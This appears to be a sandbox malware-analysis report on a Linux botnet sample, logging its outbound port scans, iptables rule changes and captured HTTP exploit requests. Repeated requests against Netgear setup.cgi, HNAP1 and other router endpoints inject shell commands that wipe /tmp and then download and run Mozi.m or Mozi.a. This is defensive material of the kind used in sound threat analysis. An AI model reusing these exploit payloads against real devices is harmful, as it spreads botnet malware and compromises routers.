Source: global traffic	TCP traffic: 192.168.2.20:39982 -> 50.163.12.13:8443
Source: global traffic	TCP traffic: 192.168.2.20:55866 -> 146.41.13.62:5555
Source: global traffic	TCP traffic: 192.168.2.20:36400 -> 137.49.209.45:7574
Source: global traffic	TCP traffic: 192.168.2.20:47064 -> 70.132.111.66:37215
Source: global traffic	TCP traffic: 192.168.2.20:57098 -> 123.138.120.67:52869
Source: global traffic	TCP traffic: 192.168.2.20:36650 -> 55.239.199.186:8443
Source: global traffic	TCP traffic: 192.168.2.20:52960 -> 117.35.249.160:8080
Source: global traffic	TCP traffic: 192.168.2.20:56046 -> 131.78.144.55:7574
Source: global traffic	TCP traffic: 192.168.2.20:41090 -> 74.120.254.188:81
Source: global traffic	TCP traffic: 192.168.2.20:44662 -> 2.216.247.11:37215
Source: global traffic	TCP traffic: 192.168.2.20:57762 -> 38.214.49.224:5555
Source: global traffic	TCP traffic: 192.168.2.20:40068 -> 197.42.173.187:5555
Source: global traffic	TCP traffic: 192.168.2.20:54998 -> 184.102.137.171:8443
Source: global traffic	TCP traffic: 192.168.2.20:36676 -> 163.90.78.111:52869
Source: global traffic	TCP traffic: 192.168.2.20:53300 -> 120.239.0.46:37215
Source: global traffic	TCP traffic: 192.168.2.20:46448 -> 202.146.192.67:8443
Source: global traffic	TCP traffic: 192.168.2.20:44270 -> 136.17.183.97:8080
Source: global traffic	TCP traffic: 192.168.2.20:47752 -> 165.0.97.192:7574
Source: global traffic	TCP traffic: 192.168.2.20:35284 -> 178.58.212.116:8080
Source: global traffic	TCP traffic: 192.168.2.20:45608 -> 57.44.164.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:43716 -> 108.148.40.172:81
Source: global traffic	TCP traffic: 192.168.2.20:59424 -> 221.222.213.136:37215
Source: global traffic	TCP traffic: 192.168.2.20:40884 -> 27.232.91.39:7574
Source: global traffic	TCP traffic: 192.168.2.20:50102 -> 222.145.19.211:7574
Source: global traffic	TCP traffic: 192.168.2.20:55268 -> 221.17.206.67:8080
Source: global traffic	TCP traffic: 192.168.2.20:41272 -> 47.230.160.237:8080
Source: global traffic	TCP traffic: 192.168.2.20:49292 -> 175.59.180.182:8080
Source: global traffic	TCP traffic: 192.168.2.20:51664 -> 31.145.88.88:5555
Source: global traffic	TCP traffic: 192.168.2.20:40566 -> 60.119.0.161:8080
Source: global traffic	TCP traffic: 192.168.2.20:55968 -> 218.182.128.219:49152
Source: global traffic	TCP traffic: 192.168.2.20:51464 -> 191.161.67.173:8080
Source: global traffic	TCP traffic: 192.168.2.20:39428 -> 28.252.213.100:81
Source: global traffic	TCP traffic: 192.168.2.20:52486 -> 188.49.215.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:51178 -> 101.14.201.110:7574
Source: global traffic	TCP traffic: 192.168.2.20:41060 -> 112.98.144.186:5555
Source: global traffic	TCP traffic: 192.168.2.20:57304 -> 219.172.189.248:8080
Source: global traffic	TCP traffic: 192.168.2.20:60502 -> 220.7.231.110:8080
Source: global traffic	TCP traffic: 192.168.2.20:44498 -> 173.229.39.3:81
Source: global traffic	TCP traffic: 192.168.2.20:34544 -> 179.177.100.169:81
Source: global traffic	TCP traffic: 192.168.2.20:41018 -> 144.0.182.62:37215
Source: global traffic	TCP traffic: 192.168.2.20:37776 -> 204.223.72.227:81
Source: global traffic	TCP traffic: 192.168.2.20:44130 -> 49.200.13.47:7574
Source: global traffic	TCP traffic: 192.168.2.20:39614 -> 218.145.20.192:81
Source: global traffic	TCP traffic: 192.168.2.20:47752 -> 171.158.205.147:81
Source: global traffic	TCP traffic: 192.168.2.20:42876 -> 199.83.99.48:7574
Source: global traffic	TCP traffic: 192.168.2.20:47020 -> 24.244.200.17:52869
Source: global traffic	TCP traffic: 192.168.2.20:59912 -> 143.44.220.86:52869
Source: global traffic	TCP traffic: 192.168.2.20:37316 -> 218.34.244.171:8080
Source: global traffic	TCP traffic: 192.168.2.20:60112 -> 219.15.149.67:81
Source: global traffic	TCP traffic: 192.168.2.20:36974 -> 159.212.6.68:49152
Source: global traffic	TCP traffic: 192.168.2.20:52804 -> 89.179.8.221:37215
Source: global traffic	TCP traffic: 192.168.2.20:41346 -> 54.241.53.245:8080
Source: global traffic	TCP traffic: 192.168.2.20:51258 -> 203.182.49.38:81
Source: global traffic	TCP traffic: 192.168.2.20:34910 -> 96.0.134.167:52869
Source: global traffic	TCP traffic: 192.168.2.20:55866 -> 25.84.54.191:49152
Source: global traffic	TCP traffic: 192.168.2.20:34006 -> 132.204.24.45:81
Source: global traffic	TCP traffic: 192.168.2.20:42814 -> 77.146.207.6:5555
Source: global traffic	TCP traffic: 192.168.2.20:54740 -> 70.193.124.115:8080
Source: global traffic	TCP traffic: 192.168.2.20:40672 -> 22.215.56.118:8443
Source: global traffic	TCP traffic: 192.168.2.20:59510 -> 79.233.156.161:81
Source: global traffic	TCP traffic: 192.168.2.20:35900 -> 131.164.56.28:49152
Source: global traffic	TCP traffic: 192.168.2.20:41678 -> 94.105.143.222:52869
Source: global traffic	TCP traffic: 192.168.2.20:33806 -> 42.240.2.232:52869
Source: global traffic	TCP traffic: 192.168.2.20:45322 -> 82.248.38.210:52869
Source: global traffic	TCP traffic: 192.168.2.20:38978 -> 86.42.21.77:8080
Source: global traffic	TCP traffic: 192.168.2.20:41156 -> 82.166.160.42:8080
Source: global traffic	TCP traffic: 192.168.2.20:55702 -> 115.164.165.163:8080
Source: global traffic	TCP traffic: 192.168.2.20:41750 -> 125.107.95.242:8443
Source: global traffic	TCP traffic: 192.168.2.20:45732 -> 158.221.123.193:8080
Source: global traffic	TCP traffic: 192.168.2.20:42202 -> 45.6.47.21:37215
Source: global traffic	TCP traffic: 192.168.2.20:42140 -> 108.113.55.135:37215
Source: global traffic	TCP traffic: 192.168.2.20:45128 -> 45.223.245.22:5555
Source: global traffic	TCP traffic: 192.168.2.20:41386 -> 29.165.152.160:81
Source: global traffic	TCP traffic: 192.168.2.20:33734 -> 58.42.142.49:8080
Source: global traffic	TCP traffic: 192.168.2.20:35364 -> 69.177.159.83:8080
Source: global traffic	TCP traffic: 192.168.2.20:40160 -> 39.137.251.253:81
Source: global traffic	TCP traffic: 192.168.2.20:50860 -> 97.240.224.79:5555
Source: global traffic	TCP traffic: 192.168.2.20:52252 -> 67.132.101.240:8080
Source: global traffic	TCP traffic: 192.168.2.20:43296 -> 191.69.17.65:5555
Source: global traffic	TCP traffic: 192.168.2.20:33154 -> 73.150.235.205:37215
Source: global traffic	TCP traffic: 192.168.2.20:40724 -> 171.240.208.62:8080
Source: global traffic	TCP traffic: 192.168.2.20:35514 -> 22.30.91.157:37215
Source: global traffic	TCP traffic: 192.168.2.20:40068 -> 208.11.186.103:49152
Source: global traffic	TCP traffic: 192.168.2.20:58650 -> 221.170.9.187:8443
Source: global traffic	TCP traffic: 192.168.2.20:53848 -> 75.134.61.79:8443
Source: global traffic	TCP traffic: 192.168.2.20:48944 -> 170.143.242.18:8443
Source: global traffic	TCP traffic: 192.168.2.20:55926 -> 198.64.242.147:8080
Source: global traffic	TCP traffic: 192.168.2.20:60362 -> 166.79.50.7:5555
Source: global traffic	TCP traffic: 192.168.2.20:52474 -> 189.159.1.246:8080
Source: global traffic	TCP traffic: 192.168.2.20:35372 -> 126.218.25.66:81
Source: global traffic	TCP traffic: 192.168.2.20:54260 -> 89.61.117.218:8443
Source: global traffic	TCP traffic: 192.168.2.20:48708 -> 9.206.51.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:44570 -> 119.15.221.144:81
Source: global traffic	TCP traffic: 192.168.2.20:37366 -> 180.190.249.44:49152
Source: global traffic	TCP traffic: 192.168.2.20:44712 -> 69.178.186.109:81
Source: global traffic	TCP traffic: 192.168.2.20:47922 -> 55.102.201.253:81
Source: global traffic	TCP traffic: 192.168.2.20:46694 -> 168.216.111.161:37215
Source: global traffic	TCP traffic: 192.168.2.20:37238 -> 1.207.152.148:8080
Source: global traffic	TCP traffic: 192.168.2.20:59336 -> 50.70.173.82:37215
Source: global traffic	TCP traffic: 192.168.2.20:45268 -> 78.196.185.102:7574
Source: global traffic	TCP traffic: 192.168.2.20:34614 -> 220.172.15.204:7574
Source: global traffic	TCP traffic: 192.168.2.20:51434 -> 155.201.44.186:49152
Source: global traffic	TCP traffic: 192.168.2.20:50938 -> 139.84.176.29:7574
Source: global traffic	TCP traffic: 192.168.2.20:48766 -> 121.134.144.130:8443
Source: global traffic	TCP traffic: 192.168.2.20:38460 -> 3.106.131.99:49152
Source: global traffic	TCP traffic: 192.168.2.20:48356 -> 106.201.55.245:8080
Source: global traffic	TCP traffic: 192.168.2.20:51430 -> 104.218.87.244:81
Source: global traffic	TCP traffic: 192.168.2.20:33508 -> 139.93.154.170:49152
Source: global traffic	TCP traffic: 192.168.2.20:47218 -> 61.193.135.39:52869
Source: global traffic	TCP traffic: 192.168.2.20:48782 -> 36.13.133.207:5555
Source: global traffic	TCP traffic: 192.168.2.20:45878 -> 82.109.64.3:52869
Source: global traffic	TCP traffic: 192.168.2.20:33012 -> 104.178.119.156:52869
Source: global traffic	TCP traffic: 192.168.2.20:44216 -> 169.209.56.181:81
Source: global traffic	TCP traffic: 192.168.2.20:60430 -> 217.89.51.86:81
Source: global traffic	TCP traffic: 192.168.2.20:57172 -> 30.177.86.43:8443
Source: global traffic	TCP traffic: 192.168.2.20:59448 -> 90.207.33.129:8080
Source: global traffic	TCP traffic: 192.168.2.20:42788 -> 178.244.39.81:8443
Source: global traffic	TCP traffic: 192.168.2.20:40106 -> 88.61.157.84:7574
Source: global traffic	TCP traffic: 192.168.2.20:58166 -> 194.114.33.228:49152

Source: /bin/sh (PID: 4637)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4671)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4674)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4715)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4739)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4758)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4776)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4795)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 4898)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4915)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4918)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4921)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4949)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4975)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 4999)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5024)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5051)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5077)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5103)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5124)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5128)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5131)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5142)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5167)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 5220)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5223)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5236)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5267)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5295)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5299)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5309)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 7723 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 5337)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 7723 -j ACCEPT	Jump to behavior

Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.201.250.66:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 217.182.243.67:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.65.120.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 35.244.243.215:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
